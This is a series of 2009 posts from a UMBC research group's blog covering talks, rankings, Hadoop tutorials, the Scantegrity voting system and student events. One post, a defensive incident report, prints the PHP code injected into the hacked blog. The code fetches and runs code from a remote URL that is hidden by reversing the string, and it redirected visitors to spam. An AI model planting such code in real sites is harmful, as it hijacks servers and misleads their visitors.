Martin Roesch will speak on Effective Network Security in a Dynamic World to kick off UMBC’s 10th Annual Visionaries in IT forum on Wednesday September 30.

Martin Roesch, a respected authority on intrusion prevention and detection technology and forensics, will discuss why today’s network security isn’t getting the job done. He will also share his vision on where network security is heading in the future. Why must network security be intelligent to be effective? Why must it provide full network visibility, relevant context, and automated impact assessment and IPS tuning? How can network security adapt to dynamic networks and threats in real time?

Roesch is the founder and CTO of Sourcefire, a network security company based in Columbia MD. Roesch is also well known as the creator of the widely used Snort network intrusion detection and prevention system.

The breakfast meeting is free and open to the public, but registration is required. It will take place at the Westin BWI hotel (map, 1110 Old Elkridge Landing Road, Linthicum, MD 21090, (443) 577-2300) 7:30am – 9:00am on Wednesday 30 September 2009.

I’m very gratified to see UMBC recognized in the U.S. News and World Report annual report on America’s Best Colleges. UMBC was ranked first on the list of “up-and-coming” national universities and fourth on the list of national universities committed to undergraduate education. UMBC was actually tied for fourth with Stanford on the list of schools most committed to undergraduate teaching, but I think an appropriate tie breaker would be chess and UMBC has always dominated Stanford in the Pan American Intercollegiate Team Chess Championship.

Most of the details are only available if you purchase the report, but there are stories in today’s Baltimore Sun and Washington Post.

Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old Wordpress installation was exploited to add the following code to the top of our blog’s main page.

< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>

This code caused URLs like http://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest Wordpress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)

We discovered the problem though a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:

• adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
• viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu

I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.

The results of this Google search reveal many compromised blogs from the .edu domain.

The 4th annual UMBC Digital Entertainment Conference will be held 10-6 Saturday, April 25, 2009 in Lecture hall 2. This event is organized by the UMBC Game Developers Club and is free and open to the public. This year’s conference will feature speakers from local studios who will talk about programming, game design and art in game development, including:

• Justin Boswell, Senior Programmer, Firaxis
• Barry Caudill, Executive Producer, Firaxis
• Dave Inscore, Studio Art Director, Big Huge Games
• Eric Jordan, Programmer, Firaxis
• Martin Kau, Concept Artist, Big Huge Games
• Jon Shafer, Designer/Programmer, Firaxis

You can find more information and RSVP on the FaceBook DEC page.

We were happy to see recent UMBC alumnus Akshay Java’s work on Twitter is mentioned in an article, Utility in the Jumble of Tweets, in yesterday’s New York Times.

“Some developers are creating tools to help companies keep an eye on the buzz. Akshay Java, a scientist at Microsoft, is trying to figure out a way to identify which experts are most influential on given topics by automatically analyzing the content of their tweets and who is in their Twitter network. Companies like Microsoft could use that information to figure out which twitterers they should contact to create buzz about a new product.”

Hadoop has become one of the most popular frameworks to exploit parallelism on a computing cluster. You don’t actually need access to a cluster to try Hadoop, learn how to use it, and develop code to solve your own problems.

UMBC Ph.D student Vlad Korolev has written an excellent tutorial, Hadoop on Windows with Eclipse, showing how to install and use Hadoop on a single computer running Microsoft Windows. It also covers the Eclipse Hadoop plugin, which enables you to create and run Hadoop projects from Eclipse. In addition to step by step instructions, the tutorial has short videos documenting the process.

If you want to explore Hadoop and are comfortable developing Java programs in Eclipse on a Windows box, this tutorial will get you going. Once you have mastered Hadoop and had developed your first project using it, you can go about finding a cluster to run it on.

Earlier this week the Baltimore Sun’s Andrew Ratner had a story on Twitter, When did Twitter take over the universe?. The story had this interesting quote from UMBC’s Zeynep Tufekci:

Some people who study technology aren’t sure Twitter will endure.

“Frankly, I think a lot of twittering is somewhat faddish, whereas I never thought Facebook was. … People I interviewed and surveyed would talk of serious feeling of deprivation without Facebook and I’ve hardly heard anyone say that about twitter,” Zeynep Tufekci, an assistant professor who teaches the sociology of technology at the University of Maryland, Baltimore County, wrote in an e-mail. “Will people Twitter five years from now? Perhaps, but I would not be surprised if they did not, or at least as much.”

This November will be the first time any end-to-end cryptographic system will be used in a binding governmental election.

UMBC Professor Alan Sherman and his students have been helping develop the Scantegrity open source election verification technology for optical scan voting systems. It uses privacy preserving confirmation numbers to allow each voter to verify her vote is counted and that all the votes were counted correctly.

The group has been working with Takoma Park MD to use this in a binding governmental election later this year. Alan recently wrote:

“On Saturday April 11, there will be a mock election in Takoma Park, MD, using the Scantegrity II high-integrity voting system being developed in part at the UMBC Cyber Defense Lab. Anyone is welcome to come and vote – polls will be open 10am-2pm in the Community Center at 7500 Maple Ave. This mock election is preparation for the Nov 2009 municipal election in Takoma Park which will also use Scantegrity – the first time any end-to-end cryptographic system will have been used in a binding governmental election.”

Here’s the text a short article on the election from the April 2009 Takoma Park newsletter.

This Arbor Day: Plant the Seeds for Election Verifiability

Election integrity is a major issue both nationally and internationally. During the City’s annual Arbor Day celebration, Takoma Park will try out what may be one solution. From 10 a.m. until 2 p.m. on April 11, City residents and their families and friends are invited to participate in a mock election administered by the City and its Board of Elections. The point of this mock election is to give voters an opportunity to test out and provide feedback to the City on the voting system it will use in the November 2009 municipal elections.

First among the many characteristics that set this system apart from those previously used by the City is that voters will be able to confirm that their ballots were counted.

As part of their ballot, voters will receive a confirmation code that they can write down, take home and check online to make sure their votes were counted. The confirmation number does not say how you voted and your vote remains private. What it does say, however, is that your vote is included in the final tally and that the machine read your vote correctly.

The system is paper-based and works like an optical scan voting system, making it easy to use. The only difference is that when you vote, instead of a completely black bubble, you will see the confirmation number appear as shown in the illustration above.

Writing down and checking the confirmation number is optional. So, this Arbor Day, while enjoying the festivities, drop by the Community Center Azalea Room to see how the system works. Try it out, ask questions, give feedback, and enjoy the refreshments!

To obtain more information on the Arbor Day Mock Election, visit the City’s website at www.takomaparkmd. gov. Questions may also be addressed to the City Clerk’s office at 301-891-7267 or Clerk@takomagov.org.

Here’s an item of possible interest to UMBC alumni in the area. The UMBC Alumni Association is holding a special tour and evening of networking at the National Cryptologic Musuem from 6-8pm on Wednesday March 25. If you have never visited the museum, it’s an opportunity to see some very interesting exhibits on ciphers and codes, including a working enigma machine. UMBC President Freeman Hrabowski will be there to meet with and talk to the participants. You can get more information and register for the event online or contact Monique Armstrong (phone: 410-455-1879).

We are early in the era of big data (including social and/or semantic) and more and more of us need the tools to handle it. Monday’s NYT had a story, Hadoop, a Free Software Program, Finds Uses Beyond Search, on Hadoop and Cloudera, a new startup that offering its own Hadoop distribution that is designed to beasier to install and configure.

“In the span of just a couple of years, Hadoop, a free software program named after a toy elephant, has taken over some of the world’s biggest Web sites. It controls the top search engines and determines the ads displayed next to the results. It decides what people see on Yahoo’s homepage and finds long-lost friends on Facebook.”
…
Three top engineers from Google, Yahoo and Facebook, along with a former executive from Oracle, are betting it will. They announced a start-up Monday called Cloudera, based in Burlingame, Calif., that will try to bring Hadoop’s capabilities to industries as far afield as genomics, retailing and finance. The company has just released its own version of Hadoop. The software remains free, but Cloudera hopes to make money selling support and consulting services for the software. It has only a few customers, but it wants to attract biotech, oil and gas, retail and insurance customers to the idea of making more out of their information for less.

Cloudera’s distribution, curently based on Hadoop v0.18.3, uses RPM and comes with a Web-based configuration aide. The company also offers some free basic training in mapReduce concepts, using Hadoop, developing appropriate algorithms and using Hive.

Congratulations to three time UMBC alumnus Jim Clements who was named as the 23rd president of West Virginia University yesterday. Jim received three degrees from UMBC: a BS in Computer Science (1985) and both an MS and PhD in Information Systems (1993). He joined the Towson University Computer and Information Science Department 1989 and later served as its chair. He has served as Towson’s Provost and Vice President for Academic Affairs since 2002.

If you are a high school or middle school student who is interested in
computers and also in languages, you should consider participating in the 2009 North American Computational Linguistics Olympiad (NACLO). This might be the first step on a path that could lead to your helping to create the next Google!

NACLO is a competition for middle-school and high-school students focused on solving problems involving linguistics and computational linguistics. WOrking the problems only requires keen analytical ability and good problem-solving skills — no prior background in linguistics, foreign languages or computer science is required.

NACLO consists of two rounds — an initial round on February 4 open to all students and a subsequent invitational round on March 11 for contestants who have advanced from the first. Winners of the second round will be invited to participate in the International Linguistics Olympiad. Last year, two US teams went to Bulgaria to compete in the sixth International Linguistics Olympiad and gold medals in individual and team events.

Support for NACLO is provided by Google, the Associaton for Computational Linguistics, and the National Science Foundation, which said in an August press release :

“Aside from being a fun intellectual challenge, the Olympiad mimics the skills used by researchers and scholars in the field of computational linguistics, which is increasingly important for the United States and other countries. Using computational linguistics, these experts can develop automated technologies such as translation software that cut down on the time and training needed to work with other languages, or software that automatically produces informative English summaries of documents in other languages or answer questions about information in these documents. In an increasingly global economy where businesses operate across borders and languages, having a strong pool of computational linguists is a competitive advantage. With threats emerging from different parts of the world, developing computational linguistics skills has also been identified as vital to national defense in the 21st century.” (src)

Students can participate at the NACLO site at UMBC, which is sponsored by the UMBC Institute for Language in Information Technology. Check out their poster and sample problem If you like this kind of puzzle and others like it, sign up to be part this exciting competition.

Students should register online by January 20. Late registrations may be accepted up to February 3 if space is available. The UMBC NACLO event will take place on Wednesday February 4 in room 312 of the University Center. For more information, contact one of the local organizers: Professors Marjorie McShane (marge@umbc.edu), Sergei Nirenburg (sergei@umbc.edu) and Margaret A. Russell (margaret.a.russell@gmail.com).